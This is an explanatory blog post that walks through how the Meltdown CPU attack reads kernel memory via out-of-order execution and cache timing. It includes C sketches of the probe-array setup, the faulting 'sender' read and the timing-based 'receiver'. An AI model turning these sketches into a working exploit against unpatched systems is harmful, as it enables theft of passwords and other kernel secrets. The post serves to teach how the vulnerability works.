I just read the white paper on the “Meltdown” CPU security bug because I was curious about what exactly was going on here. The white paper explains it in detail, but it’s fairly long and academic, so I thought a simpler overview was in order.
The Meltdown attack is a cunning way of bypassing the security checks of many modern CPUs, allowing kernel mode memory to be read from any process on unpatched operating systems.
This article is about how it actually works — you can read more about the implications of these vulnerabilities at the Meltdown site and elsewhere.
Firstly, to call this a “bug” (as many are) is probably overstating it a little: the CPU functions as advertised. The problem is that someone figured out how to read the side effects caused by operations that should otherwise have been prevented.
What follows is a little technical but I’ll try to explain it as simply as possible. Certainly I’ve glossed over the details — the point here is just to convey conceptually how it works.
Before getting to the actual cause of the problem, though, there are a couple of prerequisites you’ll need to understand.
The CPU cache is a block of memory on the CPU that stores recently accessed pages of data. Because these pages are cached directly on the CPU, accessing them is much faster than having to go all the way back to main memory.
When the CPU reads from main memory, it caches a copy of that page in the CPU cache. The next time it needs to read that page, it can load the value from the much faster on-CPU cache instead.
Each page in the cache is 4096 bytes, and the cache is big enough to store many of these pages (how many depends on the CPU).
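You can see this difference directly by timing two reads of the same address. The sketch below is illustrative only: it assumes an x86 CPU and GCC or Clang (for the `__rdtsc` and `_mm_clflush` intrinsics), and the exact cycle counts will vary from machine to machine:

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h>   // __rdtsc and _mm_clflush on GCC/Clang

int main(void)
{
    unsigned char *data = malloc(4096);

    _mm_clflush(data);                       // make sure the data starts out uncached

    uint64_t t0 = __rdtsc();
    (void)*(volatile unsigned char *)data;   // first read: has to go to main memory
    uint64_t t1 = __rdtsc();
    (void)*(volatile unsigned char *)data;   // second read: served from the on-CPU cache
    uint64_t t2 = __rdtsc();

    printf("uncached read: %llu cycles, cached read: %llu cycles\n",
           (unsigned long long)(t1 - t0), (unsigned long long)(t2 - t1));
    return 0;
}
```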
Each CPU core has multiple execution units, each capable of executing different types of operations.
eg: an Intel i7 has between 17 and 20 execution units, including 2x integer arithmetic, 1x divide, 1x load memory, 1x store memory unit etc…
In order to keep these units as busy as possible the CPU will look ahead at upcoming instructions and start executing them on different execution units while waiting for the current instruction to complete.
(That’s a grossly over-simplified view but sufficient for this discussion. In practice, instructions are broken down into micro-ops which are dispatched to execution units).
At any point in time the CPU is operating in either privileged mode or non-privileged mode.
Basically, the operating system runs in privileged mode and installed programs run in non-privileged mode.
If you think about the above, it appears that user mode (non-privileged) code shouldn’t be able to read kernel mode memory, because any attempt to do so will cause the CPU to throw an exception.
The problem is that, thanks to out-of-order execution, the CPU may have already started executing the instructions that follow the illegal read before the privilege check completes and the exception is raised. When the exception does fire, the results of those instructions are discarded, but their side effects on the CPU cache are not. Here’s how the attack exploits that.
Firstly, the attacker allocates a block of memory consisting of 256 pages (ie: 256 * 4096 bytes). None of these pages will be cached at this point, because none of them has been accessed yet.
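A rough sketch of that allocation might look like this (the 4096-byte page size follows the simplification above, and flushing each page with `_mm_clflush` is just an extra precaution to guarantee nothing starts out cached):

```c
#include <stdlib.h>
#include <emmintrin.h>   // _mm_clflush on GCC/Clang

#define PAGE_SIZE 4096
#define NUM_PAGES 256

// Allocate one page for each possible byte value (0..255) and flush every
// page out of the CPU cache so that none of them starts out cached.
static unsigned char *alloc_probe_block(void)
{
    unsigned char *probe = malloc(NUM_PAGES * PAGE_SIZE);
    for (int page = 0; page < NUM_PAGES; page++)
        _mm_clflush(probe + page * PAGE_SIZE);
    return probe;
}
```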
Next, a sequence of code similar to the following is executed. This is called the “sender”:
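The paper’s actual code is x86 assembly; below is a rough C equivalent with the four steps numbered so they can be referred to afterwards. Here `kernel_address` is a placeholder for the kernel address being attacked and `probe` is the 256-page block allocated above. (In a real exploit the faulting read has to be handled or suppressed, eg with a signal handler, so the process survives the exception.)

```c
// Illustrative sketch of the "sender", not the paper's actual code.
static void sender(const unsigned char *kernel_address, unsigned char *probe)
{
    unsigned char secret = *kernel_address;      /* 1: read one byte of kernel memory
                                                       (this will raise an exception)    */
    unsigned int index   = secret;               /* 2: treat that byte as an index 0..255 */
    unsigned int offset  = index * 4096;         /* 3: scale the index to a page offset   */
    volatile unsigned char tmp = probe[offset];  /* 4: read from that page of the block,
                                                       pulling it into the CPU cache      */
    (void)tmp;
}
```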
Assuming the CPU starts out-of-order execution of instructions 2–4 before instruction 1 completes, instruction 4 will cause one page of the allocated block of memory to be cached on the CPU. Which page gets cached is directly determined by the byte read from kernel mode memory. eg: if the secret byte is 21, then page 21 of the allocated memory block will now be cached on the CPU.
Finally, the “receiver” observes the side effects of this out-of-order execution to determine the secret byte that was read.
Continuing the example from above, the receiver reads a byte from each page of the allocated memory block and times how long each read takes: every page would be slow to read except page 21, which would be considerably faster, so the secret value must be 21.
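A sketch of what the receiver might look like (again illustrative rather than the paper’s code; it uses the x86 timestamp counter via `__rdtsc`, and a real attack would compare timings against a calibrated threshold rather than simply picking the fastest page):

```c
#include <stdint.h>
#include <x86intrin.h>   // __rdtsc on GCC/Clang

// Time a read of each of the 256 pages in the probe block and return the
// index of the fastest one. That page was cached by the sender, so its
// index is the secret byte.
static int recover_secret_byte(unsigned char *probe)
{
    uint64_t best_time = UINT64_MAX;
    int best_page = -1;

    for (int page = 0; page < 256; page++) {
        volatile unsigned char *addr = probe + page * 4096;

        uint64_t start = __rdtsc();
        (void)*addr;                         // read one byte from this page
        uint64_t elapsed = __rdtsc() - start;

        if (elapsed < best_time) {           // the cached page reads much faster
            best_time = elapsed;
            best_page = page;
        }
    }
    return best_page;                        // this value is the secret byte
}
```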
Now just repeat everything above for as many secret bytes as you want to read. The white paper says they were able to read at up to about 500KB/second.